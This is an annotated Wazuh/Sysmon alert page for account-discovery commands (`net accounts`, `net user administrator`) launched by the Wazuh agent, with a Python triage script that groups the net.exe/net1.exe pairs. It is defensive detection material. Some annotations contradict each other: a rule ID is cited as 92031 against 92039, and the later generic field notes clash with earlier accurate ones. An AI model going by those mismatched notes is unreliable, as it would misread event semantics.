data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.238 ProcessGuid: {94294ddc-be63-680a-250c-000000000e00} ProcessId: 12592 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be63-680a-230c-000000000e00} ParentProcessId: 10588 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
The event rendered as one string. Every value in it is also broken out into the data.win.eventdata.* fields below; query on those and use this for a one-glance read.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.238
When Sysmon saw the process start, in UTC: 108 ms after the `net.exe accounts` event in the previous alert, which is the hand-off. The alert `timestamp` is about seven seconds later (agent-to-manager delivery), not dwell time.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-250c-000000000e00}
Sysmon's identifier for the new process. Never reused, unlike a PID, so pivot on it for any children (net1.exe normally has none).

data.win.eventdata.processId:  12592
PID of the new process. Windows recycles PIDs, so only trust it together with utcTime.

data.win.eventdata.image:  C:\Windows\SysWOW64\net1.exe
The 32‑bit net1.exe. net.exe is a thin front end that hands most sub-commands to net1.exe, so this is the second half of the `net accounts` command, not a new action.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
Version resource of the PE. Same 26100 build line as net.exe; the lower revision indicates the file has not changed since the base build, which is normal.

data.win.eventdata.description:  Net Command
File description string from the PE version resource. Informational; unsigned metadata an attacker can set to anything.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the version resource. Same caveat.

data.win.eventdata.company:  Microsoft Corporation
Company string from the version resource. Same caveat.

data.win.eventdata.originalFileName:  net1.exe
Name compiled into the binary. Matches the file name in image, so the executable was not renamed.

data.win.eventdata.commandLine:  C:\WINDOWS\system32\net1 accounts
The command line net.exe built for its helper. It names System32 while image is under SysWOW64: net.exe is a 32‑bit process here, so WOW64 file-system redirection resolved System32 to SysWOW64. That mismatch is expected, not path spoofing. `net accounts` reads the local password and lockout policy (ATT&CK files it under T1201 Password Policy Discovery; the rule's T1087 tag is the broader account-discovery bucket).

data.win.eventdata.currentDirectory:  C:\Program Files (x86)\ossec-agent\
Working directory, inherited through net.exe from the Wazuh agent's install directory.

data.win.eventdata.user:  NT AUTHORITY\SYSTEM
Account the process runs as. SYSTEM with terminalSessionId 0 is a service context, not an interactive user.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
Sysmon identifier of the logon session; identical to the net.exe event, as expected for a child.

data.win.eventdata.logonId:  0x3e7
Windows logon ID. 0x3E7 (999) is the well-known SYSTEM logon on every machine, so it is not a cross-host pivot.

data.win.eventdata.terminalSessionId:  0
Session 0 is reserved for services and system processes; interactive desktops are session 1 and up.

data.win.eventdata.integrityLevel:  System
Mandatory integrity level. System is above High (elevated admin), matching the SYSTEM user.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
SHA-256 of the net1.exe image file (algorithms per the Sysmon HashAlgorithms setting). Compare across hosts on the same build or against a known-good inventory.

data.win.eventdata.parentProcessGuid:  {94294ddc-be63-680a-230c-000000000e00}
The net.exe from the previous alert (same processGuid). Searching Event ID 1 for this value as processGuid returns that record and, through its parentProcessGuid, the real launcher.

data.win.eventdata.parentProcessId:  10588
PID of the net.exe parent at the time of the spawn; matches the previous alert's processId.

data.win.eventdata.parentImage:  C:\Windows\SysWOW64\net.exe
The net.exe front end. Because every `net` command becomes a net.exe event plus a net1.exe event, and rule 92031 matches both, this alert double-counts the one above. Triage the grandparent (wazuh-agent.exe in the previous alert), not net.exe.

data.win.eventdata.parentCommandLine:  net.exe accounts
The command as given to net.exe. Same sub-command as this process, confirming the hand-off.

data.win.eventdata.parentUser:  NT AUTHORITY\SYSTEM
Account of the parent. Matches the child, so no change of account across the hand-off.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:50.934+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:50.934+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour. Note that net.exe hands its sub-commands to net1.exe, so every `net` command produces two Process Create events and, when the rule matches both, two hits.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534570.2281048
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Sysmon, so the data.win.eventdata.* fields below follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Sysmon's fixed provider GUID. Filter on it when you need an exact provider match rather than the display name.

data.win.system.eventID:  1
Sysmon Event ID 1: Process Create. Sysmon has its own ID space; the Security log's process-creation event is 4688 and its 4624 is a logon, so don't read this 1 against the Security-log table.

data.win.system.version:  5
Schema version of this event type. Newer Sysmon releases add fields to Event ID 1, so parsers that hard-code field positions break when this changes.

data.win.system.level:  4
Windows event level: 4 = Informational (1 Critical, 2 Error, 3 Warning, 5 Verbose). Sysmon's telemetry events are all Informational, so this carries no severity signal; it is rendered as INFORMATION in severityValue below.

data.win.system.task:  1
Task number from the provider manifest. For Sysmon it mirrors the event ID: 1 = Process Create.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:43.2961799Z
When the event log stamped the record (UTC, 100 ns units). Agrees with data.win.eventdata.utcTime to the millisecond; the `timestamp` at the top is when the Wazuh manager ingested it, about seven seconds later.

data.win.system.eventRecordID:  291056
Incremental log record number – handy for timeline order. The IDs skipped between the alerts on this page are Sysmon records that did not raise an alert; pull them from the host for a complete timeline.

data.win.system.processID:  3712
PID of the process that wrote the record: the Sysmon service (the same 3712 on every event here), not the process being reported. The reported process is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. Same caveat as processID.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in; the one to open in Event Viewer or pass to wevtutil on the host.

data.win.system.computer:  Attacker
Hostname stamped by Windows. Should match agent.name; a mismatch means a renamed host or a log forwarded from another machine.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.290 ProcessGuid: {94294ddc-be63-680a-260c-000000000e00} ProcessId: 16356 Image: C:\Windows\SysWOW64\net.exe FileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net.exe CommandLine: net user administrator CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} ParentProcessId: 3244 ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe" ParentUser: NT AUTHORITY\SYSTEM"
The event rendered as one string. Every value in it is also broken out into the data.win.eventdata.* fields below; query on those and use this for a one-glance read.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.290
When Sysmon saw the process start, in UTC: 160 ms after the `net.exe accounts` command began, so the two commands are one burst from the same launcher. The alert `timestamp` is about seven seconds later (agent-to-manager delivery), not dwell time.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-260c-000000000e00}
Sysmon's identifier for the new process. Unlike a PID it is never reused, so pivot on it: it appears as parentProcessGuid in the net1.exe event that follows.

data.win.eventdata.processId:  16356
PID of the new process. Windows recycles PIDs, so only trust it together with utcTime.

data.win.eventdata.image:  C:\Windows\SysWOW64\net.exe
Full path of the executable that started. SysWOW64 is the 32‑bit copy: the parent is a 32‑bit process, so WOW64 file-system redirection served it the 32‑bit binary. Not a masquerade on its own.

data.win.eventdata.fileVersion:  10.0.26100.1882 (WinBuild.160101.0800)
Version resource of the PE. 10.0.26100 is the Windows 11 24H2 / Server 2025 build line.

data.win.eventdata.description:  Net Command
File description string from the PE version resource. Informational; unsigned metadata an attacker can set to anything.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the version resource. Same caveat.

data.win.eventdata.company:  Microsoft Corporation
Company string from the version resource. Same caveat.

data.win.eventdata.originalFileName:  net.exe
Name compiled into the binary. If it differs from the file name in image, the executable was renamed (classic LOLBin evasion). Here they match.

data.win.eventdata.commandLine:  net user administrator
The exact command line. `net user administrator` prints the local Administrator account's properties (active flag, password dates, group membership). Read-only, but it is precisely the local-account enumeration (T1087.001) rule 92039 keys on, and the usual look-before-you-leap step ahead of enabling the account or changing its password. Check that no `net user administrator /active:yes` or password change followed from the same parent.

data.win.eventdata.currentDirectory:  C:\Program Files (x86)\ossec-agent\
Working directory, inherited from the parent. This is the Wazuh agent's install directory, consistent with the agent itself launching the command.

data.win.eventdata.user:  NT AUTHORITY\SYSTEM
Account the new process runs as. SYSTEM together with terminalSessionId 0 means a service context, not an interactive user.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
Sysmon identifier of the logon session; the same session as the `net accounts` events above.

data.win.eventdata.logonId:  0x3e7
Windows logon ID. 0x3E7 (999) is the well-known ID of the SYSTEM logon on every machine, so it is not a useful cross-host pivot.

data.win.eventdata.terminalSessionId:  0
Session 0 is reserved for services and system processes; interactive desktops are session 1 and up.

data.win.eventdata.integrityLevel:  System
Mandatory integrity level. System is above High (elevated admin), matching the SYSTEM user.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
SHA-256 of the image file (algorithms per the Sysmon HashAlgorithms setting). Identical to the net.exe hash in the `net accounts` alert, as it should be for the same file.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
Sysmon GUID of the parent. Same value as in the `net accounts` alert: one long-running parent issued both commands.

data.win.eventdata.parentProcessId:  3244
PID of the parent at the time of the spawn.

data.win.eventdata.parentImage:  C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
The process that launched net.exe: the Wazuh agent service itself. Wazuh's Security Configuration Assessment (SCA) policies run commands such as `net accounts` and `net user administrator` to evaluate password-policy and Administrator-account checks, which would account for both the command and the SYSTEM context. That is an inference from the parent, not something this alert proves: confirm against this agent's SCA policy and scan schedule before closing it as expected behaviour. The same command with any other parent (cmd.exe in a user session, an Office process, a web-server worker) deserves the full Medium treatment.

data.win.eventdata.parentCommandLine:  "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
How the parent was started. A bare service path with no arguments is what the service control manager produces.

data.win.eventdata.parentUser:  NT AUTHORITY\SYSTEM
Account of the parent. Matches the child, so no change of account between the two.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
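
The four Sysmon Event ID 1 alerts on this page are two logical commands (`net accounts` and `net user administrator`), each split into a net.exe event and a net1.exe event, all launched by wazuh-agent.exe. Below is an added triage example (not SOCscribe, Wazuh or Sysmon code) that folds each net1.exe child back into its net.exe parent via processGuid/parentProcessGuid, walks up to the launching process, flags the expected WOW64 System32-to-SysWOW64 mismatch, and labels commands whose launcher is on an allow list. The event values are copied from the alerts on this page; the allow list (the Wazuh agent) is an assumption for illustration and must be validated against the agent's actual SCA policy before it is used to close alerts.

```python
# Added triage example; not SOCscribe, Wazuh or Sysmon code.
# Folds the net.exe -> net1.exe pairs that Sysmon Event ID 1 records for every
# "net ..." command back into one row, then walks parentProcessGuid upward to
# find the process that actually launched the command.
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcCreate:
    """The subset of Sysmon EID 1 fields needed for a process-tree pivot."""
    guid: str          # data.win.eventdata.processGuid
    parent_guid: str   # data.win.eventdata.parentProcessGuid
    image: str         # data.win.eventdata.image
    cmdline: str       # data.win.eventdata.commandLine
    parent_image: str  # data.win.eventdata.parentImage
    user: str          # data.win.eventdata.user


WAZUH_AGENT = r"C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"

# Constructed from the four alerts on this page. wazuh-agent.exe itself has no
# EID 1 in this set (it started earlier), so it is the top of the tree.
EVENTS: List[ProcCreate] = [
    ProcCreate("{94294ddc-be63-680a-230c-000000000e00}", "{94294ddc-ea88-67fe-4900-000000000e00}",
               r"C:\Windows\SysWOW64\net.exe", "net.exe accounts",
               WAZUH_AGENT, r"NT AUTHORITY\SYSTEM"),
    ProcCreate("{94294ddc-be63-680a-250c-000000000e00}", "{94294ddc-be63-680a-230c-000000000e00}",
               r"C:\Windows\SysWOW64\net1.exe", r"C:\WINDOWS\system32\net1 accounts",
               r"C:\Windows\SysWOW64\net.exe", r"NT AUTHORITY\SYSTEM"),
    ProcCreate("{94294ddc-be63-680a-260c-000000000e00}", "{94294ddc-ea88-67fe-4900-000000000e00}",
               r"C:\Windows\SysWOW64\net.exe", "net user administrator",
               WAZUH_AGENT, r"NT AUTHORITY\SYSTEM"),
    ProcCreate("{94294ddc-be63-680a-280c-000000000e00}", "{94294ddc-be63-680a-260c-000000000e00}",
               r"C:\Windows\SysWOW64\net1.exe", r"C:\WINDOWS\system32\net1 user administrator",
               r"C:\Windows\SysWOW64\net.exe", r"NT AUTHORITY\SYSTEM"),
]

# ASSUMPTION for illustration: launchers for which "net accounts" / "net user"
# are expected. Validate against the agent's SCA policy before closing on it.
EXPECTED_LAUNCHERS = {WAZUH_AGENT.lower()}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def wow64_redirected(e: ProcCreate) -> bool:
    """Command line asked for System32 but the image is under SysWOW64: normal
    file-system redirection for a 32-bit parent, not a path spoof."""
    return "\\syswow64\\" in e.image.lower() and "\\system32\\" in e.cmdline.lower()


def is_net1_half(e: ProcCreate, by_guid: Dict[str, ProcCreate]) -> bool:
    """True for the net1.exe event that net.exe spawns to run the sub-command."""
    parent = by_guid.get(e.parent_guid)
    return (basename(e.image) == "net1.exe" and parent is not None
            and basename(parent.image) == "net.exe")


def logical_commands(events: List[ProcCreate]) -> List[dict]:
    by_guid = {e.guid: e for e in events}
    rows = []
    for e in events:
        if is_net1_half(e, by_guid):
            continue  # folded into its net.exe parent below
        top = e
        while top.parent_guid in by_guid:   # climb while we hold the parent's EID 1
            top = by_guid[top.parent_guid]
        kids = [c for c in events if c.parent_guid == e.guid]
        rows.append({
            "command": e.cmdline,
            "user": e.user,
            "launcher": top.parent_image,  # first ancestor without an EID 1 here
            "event_guids": [e.guid] + [c.guid for c in kids],
            "wow64_redirect": any(wow64_redirected(x) for x in [e] + kids),
        })
    return rows


def triage(events: List[ProcCreate]) -> List[dict]:
    out = []
    for row in logical_commands(events):
        known = row["launcher"].lower() in EXPECTED_LAUNCHERS
        out.append({**row, "verdict": "expected-launcher" if known else "review"})
    return out


if __name__ == "__main__":
    for r in triage(EVENTS):
        print(f'{r["verdict"]:17} {r["user"]:20} {r["command"]!r} '
              f'via {r["launcher"]} (events: {len(r["event_guids"])})')
```

Run as-is and the four alerts collapse to two rows, both attributed to wazuh-agent.exe and both showing the WOW64 redirect. Feed it the same fields for a net.exe spawned by anything not on the list and the verdict becomes `review`, which is the case that deserves the Medium label.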

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:50.966+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:50.966+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour. Note that net.exe hands its sub-commands to net1.exe, so every `net` command produces two Process Create events and, when the rule matches both, two hits; this alert is the second half of the one above.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534570.2286331
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the event. Sysmon, so the data.win.eventdata.* fields below follow Sysmon's schema, not the Security log's.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Sysmon's fixed provider GUID. Filter on it when you need an exact provider match rather than the display name.

data.win.system.eventID:  1
Sysmon Event ID 1: Process Create. Sysmon has its own ID space; the Security log's process-creation event is 4688 and its 4624 is a logon, so don't read this 1 against the Security-log table.

data.win.system.version:  5
Schema version of this event type. Newer Sysmon releases add fields to Event ID 1, so parsers that hard-code field positions break when this changes.

data.win.system.level:  4
Windows event level: 4 = Informational (1 Critical, 2 Error, 3 Warning, 5 Verbose). Sysmon's telemetry events are all Informational, so this carries no severity signal; it is rendered as INFORMATION in severityValue below.

data.win.system.task:  1
Task number from the provider manifest. For Sysmon it mirrors the event ID: 1 = Process Create.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:43.3953532Z
When the event log stamped the record (UTC, 100 ns units). Agrees with data.win.eventdata.utcTime to the millisecond; the `timestamp` at the top is when the Wazuh manager ingested it, about seven seconds later.

data.win.system.eventRecordID:  291059
Incremental log record number – handy for timeline order. The IDs skipped between the alerts on this page are Sysmon records that did not raise an alert; pull them from the host for a complete timeline.

data.win.system.processID:  3712
PID of the process that wrote the record: the Sysmon service (the same 3712 on every event here), not the process being reported. The reported process is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. Same caveat as processID.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record lives in; the one to open in Event Viewer or pass to wevtutil on the host.

data.win.system.computer:  Attacker
Hostname stamped by Windows. Should match agent.name; a mismatch means a renamed host or a log forwarded from another machine.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:42:43.390 ProcessGuid: {94294ddc-be63-680a-280c-000000000e00} ProcessId: 16124 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 user administrator CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-be63-680a-260c-000000000e00} ParentProcessId: 16356 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net user administrator ParentUser: NT AUTHORITY\SYSTEM"
The event rendered as one string. Every value in it is also broken out into the data.win.eventdata.* fields below; query on those and use this for a one-glance read.

data.win.eventdata.utcTime:  2025-04-24 22:42:43.390
When Sysmon saw the process start, in UTC: 100 ms after the `net user administrator` event in the previous alert, which is the hand-off. The alert `timestamp` is about seven seconds later (agent-to-manager delivery), not dwell time.

data.win.eventdata.processGuid:  {94294ddc-be63-680a-280c-000000000e00}
Sysmon's identifier for the new process. Never reused, unlike a PID, so pivot on it for any children (net1.exe normally has none).

data.win.eventdata.processId:  16124
PID of the new process. Windows recycles PIDs, so only trust it together with utcTime.

data.win.eventdata.image:  C:\Windows\SysWOW64\net1.exe
The 32‑bit net1.exe. net.exe is a thin front end that hands most sub-commands to net1.exe, so this is the second half of the `net user administrator` command, not a new action.

data.win.eventdata.fileVersion:  10.0.26100.1 (WinBuild.160101.0800)
Version resource of the PE. Same 26100 build line as net.exe; the lower revision indicates the file has not changed since the base build, which is normal.

data.win.eventdata.description:  Net Command
File description string from the PE version resource. Informational; unsigned metadata an attacker can set to anything.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the version resource. Same caveat.

data.win.eventdata.company:  Microsoft Corporation
Company string from the version resource. Same caveat.

data.win.eventdata.originalFileName:  net1.exe
Name compiled into the binary. Matches the file name in image, so the executable was not renamed.

data.win.eventdata.commandLine:  C:\WINDOWS\system32\net1 user administrator
The command line net.exe built for its helper. It names System32 while image is under SysWOW64: net.exe is a 32‑bit process here, so WOW64 file-system redirection resolved System32 to SysWOW64. That mismatch is expected, not path spoofing. The sub-command is the same local Administrator enumeration (T1087.001) already flagged in the previous alert.

data.win.eventdata.currentDirectory:  C:\Program Files (x86)\ossec-agent\
Working directory, inherited through net.exe from the Wazuh agent's install directory.

data.win.eventdata.user:  NT AUTHORITY\SYSTEM
Account the process runs as. SYSTEM with terminalSessionId 0 is a service context, not an interactive user.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
Sysmon identifier of the logon session; identical to the net.exe event, as expected for a child.

data.win.eventdata.logonId:  0x3e7
Windows logon ID. 0x3E7 (999) is the well-known SYSTEM logon on every machine, so it is not a cross-host pivot.

data.win.eventdata.terminalSessionId:  0
Session 0 is reserved for services and system processes; interactive desktops are session 1 and up.

data.win.eventdata.integrityLevel:  System
Mandatory integrity level. System is above High (elevated admin), matching the SYSTEM user.

data.win.eventdata.hashes:  SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
SHA-256 of the net1.exe image file (algorithms per the Sysmon HashAlgorithms setting). Identical to the net1.exe hash in the `net accounts` alert, as it should be for the same file.

data.win.eventdata.parentProcessGuid:  {94294ddc-be63-680a-260c-000000000e00}
The net.exe from the previous alert (same processGuid). Searching Event ID 1 for this value as processGuid returns that record and, through its parentProcessGuid, the real launcher.

data.win.eventdata.parentProcessId:  16356
PID of the net.exe parent at the time of the spawn; matches the previous alert's processId.

data.win.eventdata.parentImage:  C:\Windows\SysWOW64\net.exe
The net.exe front end. Because every `net` command becomes a net.exe event plus a net1.exe event, and rule 92039 matches both, this alert double-counts the one above. Triage the grandparent (wazuh-agent.exe in the previous alert), not net.exe.

data.win.eventdata.parentCommandLine:  net user administrator
The command as given to net.exe. Same sub-command as this process, confirming the hand-off.

data.win.eventdata.parentUser:  NT AUTHORITY\SYSTEM
Account of the parent. Matches the child, so no change of account across the hand-off.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

A net.exe account discovery command was initiated

🧠 What happened? A net.exe account discovery command was initiated

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:42:51.027+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:42:51.027+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  A net.exe account discovery command was initiated
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92039
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy, but it can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534571.2291476
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:42:43.4548542Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  291062
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
